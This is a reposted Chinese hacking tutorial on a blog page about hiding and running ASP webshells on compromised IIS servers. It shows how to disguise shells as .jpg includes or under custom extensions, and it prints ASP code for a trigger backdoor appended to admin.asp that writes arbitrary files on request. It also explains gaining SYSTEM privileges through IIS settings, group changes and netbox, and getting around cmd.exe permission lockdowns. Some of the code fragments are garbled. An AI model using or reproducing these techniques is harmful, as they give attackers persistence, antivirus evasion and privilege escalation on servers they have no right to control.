突破常规限制运行asp木马(转)[@more@]  脚本入侵中往往会上传一个asp木马来进一步扩大权限,或者在肉鸡中留一个asp后门也是一个不错的选择。但是如何让asp木马更加隐匿和强大,从而躲过网管查杀逃过杀毒软件追杀,并且具备system权限呢?改变代码变量也许是一个解决问题的办法,但是我们不如换个角度思考,何不尝试改变asp木马的运行方式?  首先,我们可以换个任意后缀来运行asp木马。换任意后缀来运行asp文件方法有两种,一种是include指令的使用。include指令可以让我们直接调用位于其它文件的函数,而不管后缀名是什么。像我写了一个简单的asp木马,功能是遍历c:盘,源码如下:   c:lcx.txt ") %>  我们可以将这段源码保存成1.jpg,然后将这句指令<!--#include file="1.jpg"--&gt放在2.asp文件的文件头或文件尾,那么我们执行2.asp时,放在2.asp同目录下的1.jpg同样也会被调用,起到遍历c:的功能即在c:下生成lcx.txt这一文件。第二种方法是iis管理器中用asp.dll来解析任意后缀。在iis默认安装情况下,我们可以查觉asa、cer、cdx后缀也可以成功运行asp代码,因为这三种后缀的文件映射都是调用了系统的asp.dll。根据这一启示,我们可以做一个.lcx的后缀映射,用ntsystem32下的asp.dll来解析,这样做完后写有asp源码的lcx后缀文件也会成功运行asp程序。其方法是依次打开电脑的控制面板-管理工具-Internet 服务管理器-web站点-右键属性-主目录-配置-添加。图1。  其次,我们可以让asp木马来触发才运行。无论你的asp木马写得多么好,基本总会调用到WSCRIPT.SHELL和Scripting.FileSystemObject这两个对象。有经验的网管可以运行查找功能,让你的木马无处可逃。(这里我也顺便给大家提供一个启明星工作室编写的查找asp木马的工具,见附件)我们能不能做到调用这两个对象的asp木马不放在肉鸡上,需要时能够随时上传运行呢?runasp.asp是一个用asp实现asp文件的运行的脚本,虽然还有很多bug,但是对我们调用执行asp木马是足够用了。更为可怕的是我在runasp.asp里调用测试一些恶意代码时,居然躲过了瑞星的查杀。图2。(由于runasp.asp代码太多,文章里不方便列出,我已将其放在附件里了,大家可以自己研究一下)我们将runasp.asp放在肉鸡上是不是一个很好的asp触发器后门呢?另外,对付粗心的网管我们还可以将这样一段代码放在asp文件里:    on error resume next  id=request("id")  if request("id")=1 then  testfile=Request.form("name")  msg=Request.form("message")  set fs=server.CreateObject("scripting.filesystemobject")  set thisfile=fs.OpenTextFile(testfile,8,True,0)  thisfile.WriteLine(""&msg& "")  thisfile.close  set fs = nothing  %>      value=>            像我放在动网文章的admin.asp的文件尾端,当网管运行http://动网文章url/admin.asp时并没有引起丝毫变化,而当我们运行http://动网文章url/admin.asp?id=1时,就可以根据我们的需要生成任意asp木马文件了。  最后,我们要让asp木马具备系统权限。我们的木马现在隐匿得很深,躲过了细心网管和杀毒软件,不具备系统权限我们心有不甘。让asp木马具备系统权限的方法有三种,第一种是在iis管理器中的主目录选项里将应用程序保护选择为:低(iis进程)图3。第二种是将"IWAM_machine"这一用户加入administrators组即可。这两种方法我想大家也许都耳熟能详了,但第3种也许就不为人所知了。netbox是一款由北京综艺达软件技术有限公司自主研制的编译及开发工具,除了Apache和微软的IIS以外,目前是世界上第三个可以运行asp的应用服务器,在Windows98/NT/2000/Me/XP下都可以直接运行,而且是一个大小仅为440kb的绿色文件。我已将netbox配置好了(请见附件的netbox文件夹),大家使用的时候,只需将netbox文件夹放在某个盘符下,再在cmd下运行"x: etbox etbox.exe -install"即可安装成功netbox,以后就可以运行http://ip:88/x.asp了。需要指出的是我在netbox的配置文件里main.box里写了这样两行代码:  If httpd.Create("", 88) = 0 Then  Set host = httpd.AddHost("", "wwwroot")  意思是web的端口为88,asp文件放在netbox目录下的wwwroot文件夹。这个端口和文件夹,你都可以根据自己的需要用记事本打开main.box来修改你所想要的。我们使用这一软件最大的一个好处是我们的asp木马在netbox环境下具备了系统权限,也许用它在肉鸡上做主页留后门也是一个不错的选择哟。  另外,因为我整篇文章写得是如何突破常规限制来运行asp木马,所以还有一点我要提及。在黑客防线2003年7期xhacker有篇文章《巧妙设置cmd权限加强主机安全配置》提到过防止网上流行的cmd.asp木马(见附件)方法是可以用  cacls %systemroot/system32/cmd.exe /E /D IUSR_machine  cacls %systemroot/system32/dllcache/cmd.exe /E /D IUSR_machine  这样两条命令来限止cmd.exe的权限,于是cmd.asp木马就失去作用了。针对这种限制我们也有办法突破,我们可以将本机的cmd.exe改名传到肉鸡上,假设我们将cmd.exe改名为lcx.exe,传在肉鸡的d:lcx目录下,于是我们打开cmd.asp, 找到  Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)这一行源码,改为  Call oScript.Run ("d:lcxlcx.exe /c " & szCMD & " > " & szTempFile, 0, True)即可,我们又可以成功运行cmd.asp了。  总之,如何能更好地运行asp木马,发挥出它的强大功能,还是需要我们多动脑多动手,只有这样我们才会有新的发现。   本文来自:http://www.linuxpk.com/30497.html--&gtlinux电子图书免费下载和技术讨论基地·上一篇:拒绝网络攻击—局域网内·下一篇:漠漠孤云尽成雨---浅谈CGI脚本安全

 
     最新更新
·注册表备份和恢复·低级格式化的主要作用·如何防范恶意网站·常见文件扩展名和它们的说明·专家:警惕骇客骗局,严守企业信息·PGPforWindows介紹基本设定(2)·解剖安全帐号管理器(SAM)结构·“恶作剧之王”揭秘·绿色警戒·黑客反击战·网络四大攻击方法及安全现状描述·可攻击3种浏览器代码流于互联网·黑客最新的兴趣点,下个目标会是谁?·“僵尸”——垃圾邮件的主要传播源·Lebreat蠕虫惊现3变种·POSTFIX反病毒反垃圾Ų…·在FreeBSD上用PHP实现在线添加FTP用户·简单让你在FreeBSDADSL上…·安全版本:OpenBSD入门技巧解析·Internet连接共享上网完全攻略·关于ADSL上网网速常识·静态缓存和动态缓存的比较·最友好的SQL注入防御方法·令网站提速的7大秘方·网络基础知识大全·路由基本知识·端口映射的几种实现方法·VLAN经典诠释·问题分析与解决——ADSL错误代码·问题分析——关于2条E1的线路绑定

关于我们 | 联系方式 | 广告合作 | 诚聘英才 | 网站地图 | 网址大全 | 友情链接 | 免费注册

Copyright © 2004 - 2007 All Rights Reserved

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10752043/viewspace-969898/,如需转载,请注明出处,否则将追究法律责任。

0
0
分享到:

上一篇: 应对DoS/DDoS攻击的十条军规(转)
下一篇: 漠漠孤云尽成雨---浅谈CGI脚本安全(转)

请登录后发表评论 登录

全部评论
<%=items[i].createtime%>

<%=items[i].content%>

<%if(items[i].items.items.length) { %>

<%for(var j=0;j

<%=items[i].items.items[j].createtime%> 回复

<%=items[i].items.items[j].username%>   回复   <%=items[i].items.items[j].tousername%>: <%=items[i].items.items[j].content%>

<%}%> <%if(items[i].items.total > 5) { %>

还有<%=items[i].items.total-5%>条评论) data-count=1 data-flag=true>点击查看

<%}%>

<%}%> <%}%>

worldblog
  • 博文量

    6241

  • 访问量
    2395969

最新文章

  • 可怕的 C# (转)
  • Unify the Role-Based Security Models for Enterprise and Application Domains with .NET (转)
  • Building Secure ASP.NET Applications: Authentication, Authorization, and Secure Communication (转)
  • [Sample] Playing with music file (转)
  • 中文web-app_2_3.dtd (转)
  • 使用ASP.NET加密口令 (转)
  • C++ Builder 高手进阶 (五)用BCB编写多线程应用程序 (转)
  • 24点游戏探秘系列6:用概率统计的眼光看24点游戏 (转)
  • Schema-oriented message destination (转)
  • J2EE vs. Microsoft.NET (转)

支持我们 作者招募 用户协议 FAQ Contact Us

北京盛拓优讯信息技术有限公司. 版权所有  京ICP备09055130号-4  北京市公安局海淀分局网监中心备案编号:11010802021510

广播电视节目制作经营许可证(京) 字第1234号 中国互联网协会会员

转载于:http://blog.itpub.net/10752043/viewspace-969898/

突破常规限制运行asp木马(转)相关推荐

  1. 关于ASP木马提升权限

    来源: http://www.17nc.com/ 现在ASP木马是漫天飞,我有一次进去后发现竟然用30多个ASP木马,在帮管理员清理了后,真是累爬了.想想管理员还真是懒的可以-- 上传了ASP木马之后 ...

  2. ASP木马Webshell安全解决办案

    注意:本文所讲述之设置方法与环境:适用于Microsoft Windows 2000 Server/Win2003 SERVER IIS5.0/IIS6.0   1.首先我们来看看一般ASP木马.We ...

  3. 浅谈asp木马中自定义函数加密的解密

    现在市面上流传了N种asp的大马.就是常说的webshell.有什么全免杀版本,什么提权加强版本.但是其中很多shell都是加密的,而且存在一些后门. 很有可能同学了忙了半天入侵了一个站,是为别人忙活 ...

  4. 动易如何预防ASP木马防止网页被黑

    动易如何预防ASP木马防止网页被黑 --  作者:927955 --  发布时间:2006-8-11 1:05:22 --  动易如何预防ASP木马防止网页被黑 想必很多虚拟主机用户都遇到过网页被篡改 ...

  5. aspx连接mysql木马_让你变成ASP木马高手_安全教程_脚本之家

    1.名称:如何制作图片ASP木马 (可显示图片) 建一个asp文件,内容为 找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为 了运行成 ...

  6. IIS如何防ASP木马

    IIS是Internet Information Server的简称.IIS作为当今流行的Web服务器之一,提供了强大的Internet和Intranet服务功能,然而在ASP木马程序泛滥的今天,如何 ...

  7. 打造不死的asp木马

    打造不死的asp木马 想不到,前几天我才发现,我千辛万苦收集的asp木马,居然没有几个不被Kill的.常说养马千日用马一时,可要是连马都养不好,用的时候可就头疼了.众多杀软中,查杀效果比较好厉害的就是 ...

  8. ASP木马提升权限的N种方法

    ASP木马提升权限的N种方法 Submitted by cooldiyer on 2006, July 6, 11:53 AM. 技术 一.Serv-U提权     OK,看看他的PROGRAME里面 ...

  9. webshell中“不死僵尸”asp木马删除不了的解决方法

    昨天用闲来无事用手机浏览博客,打开后发现竟然是个Webshell页面,密码还是默认的"amdin",果断上电脑上查看,却是可以正常打开博客,经检查发现原来是wap.asp文件被换成 ...

最新文章

  1. 本地打包Docker镜像上传至阿里云远程仓库(一站式脚本)
  2. 手工纸盒子_不锈钢水槽如何选购,拉伸水槽与手工槽制造工艺有何区别
  3. Linux c中使用系统时间
  4. C#完整的通信代码(点对点,点对多,同步,异步,UDP,TCP)
  5. .NET 容器环境下创建应用 dump 文件
  6. zabbix3.4.4 监控系统安装部署
  7. mac homebrew chinese mirror
  8. DateTime字段控件值显示短格式的做法
  9. python教程视频下载-python怎么下载视频
  10. python画椭圆的逻辑_在Python中绘制椭圆轨道(使用numpy,matplotlib)
  11. java odbc timesten_TimesTen ODBC 链接库差异及相关命令行工具的使用注意事项
  12. 直播APP系统源码,直播系统源码 直播系统源码
  13. 【区块链】区块链技术指南
  14. Oracle创建表的语法
  15. ADAS功能介绍 - ACC(一)
  16. 五面拿下阿里飞猪offer,java开发程序员
  17. 客户机操作系统已禁用 cpu。请关闭或重置虚拟机。_Win10竟然内置了一台虚拟机?教你如何玩转它...
  18. 文章详情页文章评论功能
  19. Pycharm全局搜索关键字
  20. 很多人已经学会了应对恐惧和焦虑的秘诀

热门文章

  1. 字库点阵数据的竖置横排和横置横排区别
  2. 阿里云后台部署全过程-1-云服务申请与配置
  3. 数据结构中,“结点”的意思
  4. message broker
  5. MySQL的Binlog原理
  6. redolog 、undolog 和binlog
  7. 灾难-NAS服务器用的西数红盘报警处理
  8. oracle通过imp导出数据库时提示:这些对象由***导出,而不是当前用户解决方法
  9. FL Studio音乐编曲入门教程
  10. 英语计算机主板接口有,主板上常见英文的解释